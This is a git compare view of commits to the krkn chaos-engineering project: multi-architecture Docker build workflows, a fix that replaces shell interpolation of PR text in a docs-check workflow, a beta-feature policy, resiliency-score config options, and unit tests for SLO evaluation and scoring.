Compare commits

..

10 Commits

Author SHA1 Message Date
Paige Patton
3db5e1abbe no rebuild image (#1197)
Signed-off-by: Paige Patton <prubenda@redhat.com>
2026-03-20 12:54:45 -04:00
Paige Patton
1e699c6cc9 different quay users (#1196)
Signed-off-by: Paige Patton <prubenda@redhat.com>
2026-03-20 17:30:42 +01:00
Paige Patton
0ebda3e101 test multi platform (#1194)
Signed-off-by: Paige Patton <prubenda@redhat.com>
2026-03-20 11:09:33 -04:00
Tullio Sebastiani
8a5be0dd2f Resiliency Score krknctl compatibility fixes (#1195)
* added console log of the resiliency score when mode is "detailed"

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

* base image krknctl input

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

resiliency score flag

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

* removed json print in run_krkn.py

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

* unit test fix

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

---------

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>
2026-03-20 11:09:07 -04:00
Tullio Sebastiani
62dadfe25c Resiliency Score krknctl compatibility fixes (#1195)
* added console log of the resiliency score when mode is "detailed"

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

* base image krknctl input

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

resiliency score flag

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

* removed json print in run_krkn.py

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

* unit test fix

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>

---------

Signed-off-by: Tullio Sebastiani <tsebasti@redhat.com>
2026-03-20 11:08:56 -04:00
Paige Patton
cb368a2f5c adding tests coverage for resiliency scoring (#1161)
Signed-off-by: Paige Patton <prubenda@redhat.com>
2026-03-19 14:16:51 -04:00
Paige Patton
bb636cd3a9 Custom weight to resiliency (#1173)
* feat(resiliency): implement comprehensive resiliency scoring system

- Added resiliency scoring engine
- Implemented scenario-wise scoring with telemetry
- Added configurable SLOs and detailed reporting

Signed-off-by: Abhinav Sharma <abhinavs1920bpl@gmail.com>
Signed-off-by: Paige Patton <prubenda@redhat.com>

* fix: check prometheus url after openshift prometheus check

Signed-off-by: Abhinav Sharma <abhinavs1920bpl@gmail.com>
Signed-off-by: Paige Patton <prubenda@redhat.com>

* custom weight

Signed-off-by: Paige Patton <prubenda@redhat.com>

---------

Signed-off-by: Abhinav Sharma <abhinavs1920bpl@gmail.com>
Signed-off-by: Paige Patton <prubenda@redhat.com>
Co-authored-by: Abhinav Sharma <abhinavs1920bpl@gmail.com>
2026-03-19 13:14:08 -04:00
Arpit Raj
f241b2b62f fix: prevent script injection in require-docs workflow (#1187)
- replace shell interpolation of PR body with jq + $GITHUB_EVENT_PATH
- replace shell interpolation of branch name with actions/github-script
- remove unused actions/checkout step
- add 27 unit tests covering checkbox detection, docs PR search, and
  security regression checks to prevent re-introduction of the bug

Signed-off-by: Arpit Raj <vrxn.arp1traj@gmail.com>
Co-authored-by: Paige Patton <64206430+paigerube14@users.noreply.github.com>
2026-03-17 09:37:35 -04:00
Paige Patton
2a60a519cd adding run tag (#1179)
Signed-off-by: Paige Patton <prubenda@redhat.com>
2026-03-16 16:18:50 -04:00
Naga Ravi Chaitanya Elluri
31756e6d9b Add Beta features governance policy (#1185)
Introduce documentation defining Beta feature expectations, lifecycle,
user guidance, and promotion criteria to GA. This helps users understand
that Beta features are experimental and intended for early feedback.

Signed-off-by: Naga Ravi Chaitanya Elluri <nelluri@redhat.com>
2026-03-12 23:39:14 -04:00
10 changed files with 1749 additions and 56 deletions

View File

@@ -6,48 +6,117 @@ on:
jobs:
build:
runs-on: ubuntu-latest
runs-on: ${{ matrix.runner }}
strategy:
matrix:
include:
- platform: amd64
runner: ubuntu-latest
- platform: arm64
runner: ubuntu-24.04-arm
steps:
- name: Check out code
uses: actions/checkout@v3
- name: Build the Docker images
if: startsWith(github.ref, 'refs/tags')
run: |
./containers/compile_dockerfile.sh
docker build --no-cache -t quay.io/krkn-chaos/krkn containers/ --build-arg TAG=${GITHUB_REF#refs/tags/}
docker tag quay.io/krkn-chaos/krkn quay.io/redhat-chaos/krkn
docker tag quay.io/krkn-chaos/krkn quay.io/krkn-chaos/krkn:${GITHUB_REF#refs/tags/}
docker tag quay.io/krkn-chaos/krkn quay.io/redhat-chaos/krkn:${GITHUB_REF#refs/tags/}
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@v3
- name: Test Build the Docker images
if: ${{ github.event_name == 'pull_request' }}
if: github.event_name == 'pull_request'
run: |
./containers/compile_dockerfile.sh
docker build --no-cache -t quay.io/krkn-chaos/krkn containers/ --build-arg PR_NUMBER=${{ github.event.pull_request.number }}
- name: Login in quay
docker buildx build --no-cache \
--platform linux/${{ matrix.platform }} \
-t quay.io/krkn-chaos/krkn \
-t quay.io/redhat-chaos/krkn \
containers/ \
--build-arg PR_NUMBER=${{ github.event.pull_request.number }}
- name: Login to krkn-chaos quay
if: startsWith(github.ref, 'refs/tags')
run: docker login quay.io -u ${QUAY_USER} -p ${QUAY_TOKEN}
env:
QUAY_USER: ${{ secrets.QUAY_USERNAME }}
QUAY_TOKEN: ${{ secrets.QUAY_PASSWORD }}
- name: Push the KrknChaos Docker images
uses: docker/login-action@v3
with:
registry: quay.io
username: ${{ secrets.QUAY_USERNAME }}
password: ${{ secrets.QUAY_PASSWORD }}
- name: Build and push krkn-chaos images
if: startsWith(github.ref, 'refs/tags')
run: |
docker push quay.io/krkn-chaos/krkn
docker push quay.io/krkn-chaos/krkn:${GITHUB_REF#refs/tags/}
- name: Login in to redhat-chaos quay
if: startsWith(github.ref, 'refs/tags/v')
run: docker login quay.io -u ${QUAY_USER} -p ${QUAY_TOKEN}
env:
QUAY_USER: ${{ secrets.QUAY_USER_1 }}
QUAY_TOKEN: ${{ secrets.QUAY_TOKEN_1 }}
- name: Push the RedHat Chaos Docker images
./containers/compile_dockerfile.sh
TAG=${GITHUB_REF#refs/tags/}
docker buildx build --no-cache \
--platform linux/${{ matrix.platform }} \
--provenance=false \
-t quay.io/krkn-chaos/krkn:latest-${{ matrix.platform }} \
-t quay.io/krkn-chaos/krkn:${TAG}-${{ matrix.platform }} \
containers/ \
--build-arg TAG=${TAG} \
--push --load
- name: Login to redhat-chaos quay
if: startsWith(github.ref, 'refs/tags')
run: |
docker push quay.io/redhat-chaos/krkn
docker push quay.io/redhat-chaos/krkn:${GITHUB_REF#refs/tags/}
uses: docker/login-action@v3
with:
registry: quay.io
username: ${{ secrets.QUAY_USER_1 }}
password: ${{ secrets.QUAY_TOKEN_1 }}
- name: Push redhat-chaos images
if: startsWith(github.ref, 'refs/tags')
run: |
TAG=${GITHUB_REF#refs/tags/}
docker tag quay.io/krkn-chaos/krkn:${TAG}-${{ matrix.platform }} quay.io/redhat-chaos/krkn:${TAG}-${{ matrix.platform }}
docker tag quay.io/krkn-chaos/krkn:${TAG}-${{ matrix.platform }} quay.io/redhat-chaos/krkn:latest-${{ matrix.platform }}
docker push quay.io/redhat-chaos/krkn:${TAG}-${{ matrix.platform }}
docker push quay.io/redhat-chaos/krkn:latest-${{ matrix.platform }}
manifest:
runs-on: ubuntu-latest
needs: build
if: startsWith(github.ref, 'refs/tags')
steps:
- name: Login to krkn-chaos quay
uses: docker/login-action@v3
with:
registry: quay.io
username: ${{ secrets.QUAY_USERNAME }}
password: ${{ secrets.QUAY_PASSWORD }}
- name: Create and push KrknChaos manifests
run: |
TAG=${GITHUB_REF#refs/tags/}
docker manifest create quay.io/krkn-chaos/krkn:${TAG} \
quay.io/krkn-chaos/krkn:${TAG}-amd64 \
quay.io/krkn-chaos/krkn:${TAG}-arm64
docker manifest push quay.io/krkn-chaos/krkn:${TAG}
docker manifest create quay.io/krkn-chaos/krkn:latest \
quay.io/krkn-chaos/krkn:latest-amd64 \
quay.io/krkn-chaos/krkn:latest-arm64
docker manifest push quay.io/krkn-chaos/krkn:latest
- name: Login to redhat-chaos quay
uses: docker/login-action@v3
with:
registry: quay.io
username: ${{ secrets.QUAY_USER_1 }}
password: ${{ secrets.QUAY_TOKEN_1 }}
- name: Create and push RedHat Chaos manifests
run: |
TAG=${GITHUB_REF#refs/tags/}
docker manifest create quay.io/redhat-chaos/krkn:${TAG} \
quay.io/redhat-chaos/krkn:${TAG}-amd64 \
quay.io/redhat-chaos/krkn:${TAG}-arm64
docker manifest push quay.io/redhat-chaos/krkn:${TAG}
docker manifest create quay.io/redhat-chaos/krkn:latest \
quay.io/redhat-chaos/krkn:latest-amd64 \
quay.io/redhat-chaos/krkn:latest-arm64
docker manifest push quay.io/redhat-chaos/krkn:latest
- name: Rebuild krkn-hub
if: startsWith(github.ref, 'refs/tags')
uses: redhat-chaos/actions/krkn-hub@main
with:
QUAY_USER: ${{ secrets.QUAY_USERNAME }}

View File

@@ -9,37 +9,47 @@ jobs:
name: Check Documentation Update
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Check if Documentation is Required
id: check_docs
run: |
echo "Checking PR body for documentation checkbox..."
# Read the PR body from the GitHub event payload
if echo "${{ github.event.pull_request.body }}" | grep -qi '\[x\].*documentation needed'; then
# Read PR body from the event JSON file — never from shell interpolation.
# jq handles all escaping; the shell never sees the user-controlled string.
if jq -r '.pull_request.body // ""' "$GITHUB_EVENT_PATH" | \
grep -qi '\[x\].*documentation needed'; then
echo "Documentation required detected."
echo "docs_required=true" >> $GITHUB_OUTPUT
echo "docs_required=true" >> "$GITHUB_OUTPUT"
else
echo "Documentation not required."
echo "docs_required=false" >> $GITHUB_OUTPUT
echo "docs_required=false" >> "$GITHUB_OUTPUT"
fi
- name: Enforce Documentation Update (if required)
if: steps.check_docs.outputs.docs_required == 'true'
env:
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
run: |
# Retrieve feature branch and repository owner from the GitHub context
FEATURE_BRANCH="${{ github.head_ref }}"
REPO_OWNER="${{ github.repository_owner }}"
WEBSITE_REPO="website"
echo "Searching for a merged documentation PR for feature branch: $FEATURE_BRANCH in $REPO_OWNER/$WEBSITE_REPO..."
MERGED_PR=$(gh pr list --repo "$REPO_OWNER/$WEBSITE_REPO" --state merged --json headRefName,title,url | jq -r \
--arg FEATURE_BRANCH "$FEATURE_BRANCH" '.[] | select(.title | contains($FEATURE_BRANCH)) | .url')
if [[ -z "$MERGED_PR" ]]; then
echo ":x: Documentation PR for branch '$FEATURE_BRANCH' is required and has not been merged."
exit 1
else
echo ":white_check_mark: Found merged documentation PR: $MERGED_PR"
fi
uses: actions/github-script@v7
with:
github-token: ${{ secrets.GITHUB_TOKEN }}
script: |
const featureBranch = context.payload.pull_request.head.ref;
const repoOwner = context.repo.owner;
const websiteRepo = 'website';
core.info(`Searching for a merged documentation PR for feature branch: ${featureBranch} in ${repoOwner}/${websiteRepo}...`);
const { data: pulls } = await github.rest.pulls.list({
owner: repoOwner,
repo: websiteRepo,
state: 'closed',
per_page: 100,
});
const mergedPr = pulls.find(
(pr) => pr.merged_at && pr.title.includes(featureBranch)
);
if (!mergedPr) {
core.setFailed(
`❌ Documentation PR for branch '${featureBranch}' is required and has not been merged.`
);
} else {
core.info(`✅ Found merged documentation PR: ${mergedPr.html_url}`);
}

141
BETA_FEATURE_POLICY.md Normal file
View File

@@ -0,0 +1,141 @@
# Beta Features Policy
## Overview
Beta features provide users early access to new capabilities before they reach full stability and general availability (GA). These features allow maintainers to gather feedback, validate usability, and improve functionality based on real-world usage.
Beta features are intended for experimentation and evaluation. While they are functional, they may not yet meet the stability, performance, or backward compatibility guarantees expected from generally available features.
---
## What is a Beta Feature
A **Beta feature** is a feature that is released for user evaluation but is still under active development and refinement.
Beta features may have the following characteristics:
- Functionally usable but still evolving
- APIs or behavior may change between releases
- Performance optimizations may still be in progress
- Documentation may be limited or evolving
- Edge cases may not be fully validated
Beta features should be considered **experimental and optional**.
---
## User Expectations
Users trying Beta features should understand the following:
- Stability is not guaranteed
- APIs and functionality may change without notice
- Backward compatibility is not guaranteed
- The feature may evolve significantly before GA
- Production use should be evaluated carefully
We strongly encourage users to provide feedback to help improve the feature before it becomes generally available.
---
## Beta Feature Identification
All Beta features are clearly identified to ensure transparency.
### In Release Notes
Beta features will be marked with a **[BETA]** tag.
Example: [BETA] Krkn Resilience Score
### In Documentation
Beta features will include a notice similar to:
> **Beta Feature**
> This feature is currently in Beta and is intended for early user feedback. Behavior, APIs, and stability may change in future releases.
---
## Feature Lifecycle
Features typically progress through the following lifecycle stages.
### 1. Development
The feature is under active development and may not yet be visible to users.
### 2. Beta
The feature is released for early adoption and feedback.
Characteristics:
- Feature is usable
- Feedback is encouraged
- Stability improvements are ongoing
### 3. Stabilization
Based on user feedback and testing, the feature is improved to meet stability and usability expectations.
### 4. General Availability (GA)
The feature is considered stable and production-ready.
GA features provide:
- Stable APIs
- Backward compatibility guarantees
- Complete documentation
- Full CI test coverage
---
## Promotion to General Availability
A Beta feature may be promoted to GA once the following criteria are met:
- Critical bugs are resolved
- Feature stability has improved through testing
- APIs and behavior are stable
- Documentation is complete
- Community feedback has been incorporated
The promotion will be announced in the release notes.
Example: Feature promoted from Beta to GA
---
## Deprecation of Beta Features
In some cases, a Beta feature may be redesigned or discontinued.
If this happens:
- The feature will be marked as **Deprecated**
- A removal timeline will be provided
- Alternative approaches will be documented when possible
Example: [DEPRECATED] This feature will be removed in a future release.
---
## Contributing Feedback
User feedback plays a critical role in improving Beta features.
Users are encouraged to report:
- Bugs
- Usability issues
- Performance concerns
- Feature suggestions
Feedback can be submitted through:
- Krkn GitHub Issues
- Krkn GitHub Discussions
- Krkn Community channels
Please include **Beta feature context** when reporting issues.
Your feedback helps guide the roadmap and ensures features are production-ready before GA.

View File

@@ -55,6 +55,10 @@ kraken:
- kubevirt_vm_outage:
- scenarios/kubevirt/kubevirt-vm-outage.yaml
resiliency:
resiliency_run_mode: standalone # Options: standalone, controller, disabled
resiliency_file: config/alerts.yaml # Path to SLO definitions, will resolve to performance_monitoring: alert_profile: if not specified
cerberus:
cerberus_enabled: False # Enable it when cerberus is previously installed
cerberus_url: # When cerberus_enabled is set to True, provide the url where cerberus publishes go/no-go signal

View File

@@ -163,6 +163,15 @@
"default": "False",
"required": "false"
},
{
"name": "es-run-tag",
"short_description": "Elasticsearch run tag",
"description": "Elasticsearch run tag to compare similar runs",
"variable": "ES_RUN_TAG",
"type": "string",
"default": "",
"required": "false"
},
{
"name": "es-server",
"short_description": "Elasticsearch instance URL",
@@ -549,5 +558,31 @@
"separator": ",",
"default": "False",
"required": "false"
},
{
"name": "resiliency-score",
"short_description": "Enable resiliency score calculation",
"description": "The system outputs a detailed resiliency score as a single-line JSON object, facilitating easy aggregation across multiple test scenarios.",
"variable": "RESILIENCY_SCORE",
"type": "boolean",
"required": "false"
},
{
"name": "disable-resiliency-score",
"short_description": "Disable resiliency score calculation",
"description": "Disable resiliency score calculation",
"variable": "DISABLE_RESILIENCY_SCORE",
"type": "boolean",
"required": "false"
},
{
"name": "resiliency-file",
"short_description": "Resiliency Score metrics file",
"description": "Custom Resiliency score file",
"variable": "RESILIENCY_FILE",
"type": "file",
"required": "false",
"mount_path": "/home/krkn/resiliency-file.yaml"
}
]

View File

@@ -320,7 +320,7 @@ class Resiliency:
)
detailed = self.get_detailed_report()
if run_mode == "controller":
if run_mode == "detailed":
# krknctl expects the detailed report on stdout in a special format
try:
detailed_json = json.dumps(detailed)

View File

@@ -1,4 +1,4 @@
duration: 60
duration: 10
workers: '' # leave it empty '' node cpu auto-detection
hog-type: cpu
image: quay.io/krkn-chaos/krkn-hog

View File

@@ -0,0 +1,401 @@
"""
Tests for krkn.prometheus.collector module.
How to run these tests:
# Run all tests in this file
python -m unittest tests.test_prometheus_collector
# Run all tests with verbose output
python -m unittest tests.test_prometheus_collector -v
# Run a specific test class
python -m unittest tests.test_prometheus_collector.TestSLOPassed
python -m unittest tests.test_prometheus_collector.TestEvaluateSLOs
# Run a specific test method
python -m unittest tests.test_prometheus_collector.TestSLOPassed.test_empty_result_returns_none
python -m unittest tests.test_prometheus_collector.TestEvaluateSLOs.test_evaluate_single_slo_passing
# Run with coverage
python -m coverage run -m unittest tests.test_prometheus_collector
python -m coverage report -m
"""
import datetime
import unittest
from unittest.mock import Mock, patch, MagicMock
from krkn.prometheus.collector import slo_passed, evaluate_slos
class TestSLOPassed(unittest.TestCase):
"""Test cases for the slo_passed function."""
def test_empty_result_returns_none(self):
"""Test that an empty result list returns None."""
result = slo_passed([])
self.assertIsNone(result)
def test_result_with_values_all_zero_returns_true(self):
"""Test that all zero values in 'values' returns True."""
prometheus_result = [
{
"values": [
[1234567890, "0"],
[1234567891, "0"],
[1234567892, "0"],
]
}
]
result = slo_passed(prometheus_result)
self.assertTrue(result)
def test_result_with_values_containing_nonzero_returns_false(self):
"""Test that any non-zero value in 'values' returns False."""
prometheus_result = [
{
"values": [
[1234567890, "0"],
[1234567891, "1.5"], # Non-zero value
[1234567892, "0"],
]
}
]
result = slo_passed(prometheus_result)
self.assertFalse(result)
def test_result_with_single_value_zero_returns_true(self):
"""Test that a single 'value' field with zero returns True."""
prometheus_result = [
{
"value": [1234567890, "0"]
}
]
result = slo_passed(prometheus_result)
self.assertTrue(result)
def test_result_with_single_value_nonzero_returns_false(self):
"""Test that a single 'value' field with non-zero returns False."""
prometheus_result = [
{
"value": [1234567890, "5.2"]
}
]
result = slo_passed(prometheus_result)
self.assertFalse(result)
def test_result_with_no_samples_returns_none(self):
"""Test that result with no 'values' or 'value' keys returns None."""
prometheus_result = [
{
"metric": {"job": "test"}
}
]
result = slo_passed(prometheus_result)
self.assertIsNone(result)
def test_result_with_invalid_value_type_in_values(self):
"""Test handling of invalid value types in 'values' field."""
prometheus_result = [
{
"values": [
[1234567890, "invalid"], # Will raise ValueError
[1234567891, "0"],
]
}
]
# Should continue processing after ValueError and find the zero
result = slo_passed(prometheus_result)
self.assertTrue(result)
def test_result_with_invalid_value_in_single_value_returns_false(self):
"""Test that invalid value type in 'value' field returns False."""
prometheus_result = [
{
"value": [1234567890, "invalid"]
}
]
result = slo_passed(prometheus_result)
self.assertFalse(result)
def test_result_with_none_value_in_values(self):
"""Test handling of None values in 'values' field."""
prometheus_result = [
{
"values": [
[1234567890, None], # Will raise TypeError
[1234567891, "0"],
]
}
]
# Should continue processing after TypeError and find the zero
result = slo_passed(prometheus_result)
self.assertTrue(result)
def test_result_with_multiple_series_first_has_nonzero(self):
"""Test that first non-zero value in any series returns False immediately."""
prometheus_result = [
{
"values": [
[1234567890, "0"],
[1234567891, "2.0"], # Non-zero in first series
]
},
{
"values": [
[1234567890, "0"],
[1234567891, "0"],
]
}
]
result = slo_passed(prometheus_result)
self.assertFalse(result)
def test_result_with_float_zero(self):
"""Test that float zero is handled correctly."""
prometheus_result = [
{
"values": [
[1234567890, "0.0"],
[1234567891, "0.00"],
]
}
]
result = slo_passed(prometheus_result)
self.assertTrue(result)
def test_result_with_scientific_notation(self):
"""Test values in scientific notation."""
prometheus_result = [
{
"values": [
[1234567890, "0e0"],
[1234567891, "1e-10"], # Very small but non-zero
]
}
]
result = slo_passed(prometheus_result)
self.assertFalse(result)
class TestEvaluateSLOs(unittest.TestCase):
"""Test cases for the evaluate_slos function."""
def setUp(self):
"""Set up test fixtures."""
self.mock_prom_cli = Mock()
self.start_time = datetime.datetime(2025, 1, 1, 0, 0, 0)
self.end_time = datetime.datetime(2025, 1, 1, 1, 0, 0)
def test_evaluate_single_slo_passing(self):
"""Test evaluation of a single passing SLO."""
slo_list = [
{
"name": "test_slo",
"expr": "sum(rate(http_requests_total[5m]))"
}
]
# Mock the Prometheus response with all zeros (passing)
self.mock_prom_cli.process_prom_query_in_range.return_value = [
{
"values": [
[1234567890, "0"],
[1234567891, "0"],
]
}
]
results = evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
self.assertEqual(results["test_slo"], True)
self.mock_prom_cli.process_prom_query_in_range.assert_called_once_with(
"sum(rate(http_requests_total[5m]))",
start_time=self.start_time,
end_time=self.end_time,
)
def test_evaluate_single_slo_failing(self):
"""Test evaluation of a single failing SLO."""
slo_list = [
{
"name": "test_slo",
"expr": "sum(rate(errors[5m]))"
}
]
# Mock the Prometheus response with non-zero value (failing)
self.mock_prom_cli.process_prom_query_in_range.return_value = [
{
"values": [
[1234567890, "0"],
[1234567891, "5"], # Non-zero indicates failure
]
}
]
results = evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
self.assertEqual(results["test_slo"], False)
def test_evaluate_slo_with_no_data_returns_true(self):
"""Test that SLO with no data (None) is treated as passing."""
slo_list = [
{
"name": "test_slo",
"expr": "absent(metric)"
}
]
# Mock the Prometheus response with no samples
self.mock_prom_cli.process_prom_query_in_range.return_value = []
results = evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
# No data should be treated as passing
self.assertEqual(results["test_slo"], True)
def test_evaluate_slo_query_exception_returns_false(self):
"""Test that an exception during query results in False."""
slo_list = [
{
"name": "test_slo",
"expr": "invalid_query"
}
]
# Mock the Prometheus client to raise an exception
self.mock_prom_cli.process_prom_query_in_range.side_effect = Exception("Query failed")
with patch('krkn.prometheus.collector.logging') as mock_logging:
results = evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
# Exception should result in False
self.assertEqual(results["test_slo"], False)
mock_logging.error.assert_called_once()
def test_evaluate_multiple_slos(self):
"""Test evaluation of multiple SLOs with mixed results."""
slo_list = [
{
"name": "slo_pass",
"expr": "query1"
},
{
"name": "slo_fail",
"expr": "query2"
},
{
"name": "slo_no_data",
"expr": "query3"
}
]
# Mock different responses for each query
def mock_query_side_effect(expr, start_time, end_time):
if expr == "query1":
return [{"values": [[1234567890, "0"]]}]
elif expr == "query2":
return [{"values": [[1234567890, "1"]]}]
else: # query3
return []
self.mock_prom_cli.process_prom_query_in_range.side_effect = mock_query_side_effect
results = evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
self.assertEqual(results["slo_pass"], True)
self.assertEqual(results["slo_fail"], False)
self.assertEqual(results["slo_no_data"], True)
self.assertEqual(len(results), 3)
def test_evaluate_empty_slo_list(self):
"""Test evaluation with an empty SLO list."""
slo_list = []
results = evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
self.assertEqual(results, {})
self.mock_prom_cli.process_prom_query_in_range.assert_not_called()
@patch('krkn.prometheus.collector.logging')
def test_evaluate_slos_logs_info_message(self, mock_logging):
"""Test that evaluation logs an info message with SLO count."""
slo_list = [
{"name": "slo1", "expr": "query1"},
{"name": "slo2", "expr": "query2"},
]
self.mock_prom_cli.process_prom_query_in_range.return_value = [
{"values": [[1234567890, "0"]]}
]
evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
# Check that info logging was called with the expected message
mock_logging.info.assert_called_once()
call_args = mock_logging.info.call_args[0]
self.assertIn("Evaluating %d SLOs", call_args[0])
self.assertEqual(call_args[1], 2)
@patch('krkn.prometheus.collector.logging')
def test_evaluate_slos_logs_debug_for_no_data(self, mock_logging):
"""Test that no data scenario logs a debug message."""
slo_list = [
{"name": "test_slo", "expr": "query"}
]
self.mock_prom_cli.process_prom_query_in_range.return_value = []
evaluate_slos(
self.mock_prom_cli,
slo_list,
self.start_time,
self.end_time
)
# Check that debug logging was called
mock_logging.debug.assert_called_once()
call_args = mock_logging.debug.call_args[0]
self.assertIn("no data", call_args[0])
self.assertIn("test_slo", call_args[1])
if __name__ == '__main__':
unittest.main()

624
tests/test_resiliency.py Normal file
View File

@@ -0,0 +1,624 @@
"""
Tests for krkn.resiliency.resiliency module.
How to run these tests:
# Run all tests in this file
python -m unittest tests.test_resiliency
# Run all tests with verbose output
python -m unittest tests.test_resiliency -v
# Run a specific test class
python -m unittest tests.test_resiliency.TestResiliencyInit
python -m unittest tests.test_resiliency.TestResiliencyCalculateScore
python -m unittest tests.test_resiliency.TestResiliencyScenarioReports
# Run a specific test method
python -m unittest tests.test_resiliency.TestResiliencyInit.test_init_from_file
python -m unittest tests.test_resiliency.TestResiliencyScenarioReports.test_add_scenario_report
# Run with coverage
python -m coverage run -m unittest tests.test_resiliency
python -m coverage report -m
"""
import datetime
import json
import os
import tempfile
import unittest
from unittest.mock import Mock, patch
from krkn.resiliency.resiliency import Resiliency
class TestResiliencyInit(unittest.TestCase):
"""Test cases for Resiliency class initialization."""
def test_init_from_file(self):
"""Test initialization from alerts.yaml file."""
alerts_data = [
{"expr": "up == 0", "severity": "critical", "description": "Instance down"},
{"expr": "cpu > 80", "severity": "warning", "description": "High CPU"},
]
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump(alerts_data, f)
temp_file = f.name
try:
res = Resiliency(alerts_yaml_path=temp_file)
self.assertEqual(len(res._slos), 2)
self.assertEqual(res._slos[0]["name"], "Instance down")
self.assertEqual(res._slos[0]["expr"], "up == 0")
self.assertEqual(res._slos[0]["severity"], "critical")
finally:
os.unlink(temp_file)
def test_init_from_file_not_found_raises_error(self):
"""Test that missing alerts file raises FileNotFoundError."""
with self.assertRaises(FileNotFoundError):
Resiliency(alerts_yaml_path="/nonexistent/path.yaml")
def test_init_preserves_custom_weight_on_slo(self):
"""Test that custom weight is preserved from the alerts file."""
alerts_data = [
{"expr": "up == 0", "severity": "critical", "description": "slo1", "weight": 10},
]
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump(alerts_data, f)
temp_file = f.name
try:
res = Resiliency(alerts_yaml_path=temp_file)
self.assertEqual(res._slos[0]["weight"], 10)
finally:
os.unlink(temp_file)
def test_normalise_alerts_with_valid_data(self):
"""Test _normalise_alerts with valid alert data."""
raw_alerts = [
{"expr": "up == 0", "severity": "critical", "description": "Down"},
{"expr": "cpu > 80", "severity": "warning", "description": "High CPU"},
]
normalized = Resiliency._normalise_alerts(raw_alerts)
self.assertEqual(len(normalized), 2)
self.assertEqual(normalized[0]["name"], "Down")
self.assertEqual(normalized[1]["name"], "High CPU")
def test_normalise_alerts_without_description_uses_index(self):
"""Test _normalise_alerts uses index as name when description missing."""
raw_alerts = [
{"expr": "up == 0", "severity": "critical"},
]
normalized = Resiliency._normalise_alerts(raw_alerts)
self.assertEqual(normalized[0]["name"], "slo_0")
def test_normalise_alerts_skips_invalid_entries(self):
"""Test _normalise_alerts skips entries missing required fields."""
raw_alerts = [
{"expr": "up == 0", "severity": "critical"}, # Valid
{"severity": "warning"}, # Missing expr
{"expr": "cpu > 80"}, # Missing severity
"invalid", # Not a dict
]
with patch('krkn.resiliency.resiliency.logging') as mock_logging:
normalized = Resiliency._normalise_alerts(raw_alerts)
self.assertEqual(len(normalized), 1)
self.assertEqual(mock_logging.warning.call_count, 3)
def test_normalise_alerts_with_non_list_raises_error(self):
"""Test _normalise_alerts raises ValueError for non-list input."""
with self.assertRaises(ValueError):
Resiliency._normalise_alerts("not a list")
with self.assertRaises(ValueError):
Resiliency._normalise_alerts({"key": "value"})
def test_normalise_alerts_stores_weight_none_when_absent(self):
"""Test that alerts without a weight field store None, not 0, preserving severity fallback."""
raw_alerts = [
{"expr": "up == 0", "severity": "critical", "description": "no weight"},
]
normalized = Resiliency._normalise_alerts(raw_alerts)
self.assertIsNone(normalized[0]["weight"])
def test_normalise_alerts_stores_custom_weight_when_present(self):
"""Test that a numeric weight field is preserved exactly."""
raw_alerts = [
{"expr": "up == 0", "severity": "critical", "description": "slo1", "weight": 10},
{"expr": "cpu > 80", "severity": "warning", "description": "slo2", "weight": 0.5},
]
normalized = Resiliency._normalise_alerts(raw_alerts)
self.assertEqual(normalized[0]["weight"], 10)
self.assertEqual(normalized[1]["weight"], 0.5)
class TestResiliencyCalculateScore(unittest.TestCase):
"""Test cases for calculate_score method."""
def setUp(self):
"""Set up test fixtures."""
alerts_data = [
{"expr": "up == 0", "severity": "critical", "description": "slo1"},
{"expr": "cpu > 80", "severity": "warning", "description": "slo2"},
]
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump(alerts_data, f)
self.temp_file = f.name
self.res = Resiliency(alerts_yaml_path=self.temp_file)
def tearDown(self):
"""Clean up temp files."""
if os.path.exists(self.temp_file):
os.unlink(self.temp_file)
def test_calculate_score_with_all_passing(self):
"""Test calculate_score with all SLOs passing."""
self.res._results = {"slo1": True, "slo2": True}
score = self.res.calculate_score()
self.assertEqual(score, 100)
self.assertEqual(self.res._score, 100)
def test_calculate_score_with_failures(self):
"""Test calculate_score with some failures."""
self.res._results = {"slo1": False, "slo2": True}
score = self.res.calculate_score()
# slo1 is critical (3 pts lost), slo2 is warning (1 pt)
# Total: 4 pts, Lost: 3 pts -> 25%
self.assertEqual(score, 25)
def test_calculate_score_with_health_checks(self):
"""Test calculate_score includes health check results."""
self.res._results = {"slo1": True, "slo2": True}
health_checks = {"http://service": False} # Critical, 3 pts lost
score = self.res.calculate_score(health_check_results=health_checks)
# Total: 3 + 1 + 3 = 7 pts, Lost: 3 pts -> ~57%
self.assertEqual(score, 57)
self.assertEqual(self.res._health_check_results, health_checks)
def test_calculate_score_uses_per_slo_custom_weight_from_yaml(self):
"""Integration: per-SLO custom weight loaded from YAML is used in scoring."""
alerts_data = [
{"expr": "up == 0", "severity": "critical", "description": "high", "weight": 10},
{"expr": "cpu > 80", "severity": "warning", "description": "low", "weight": 0.5},
]
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump(alerts_data, f)
temp = f.name
try:
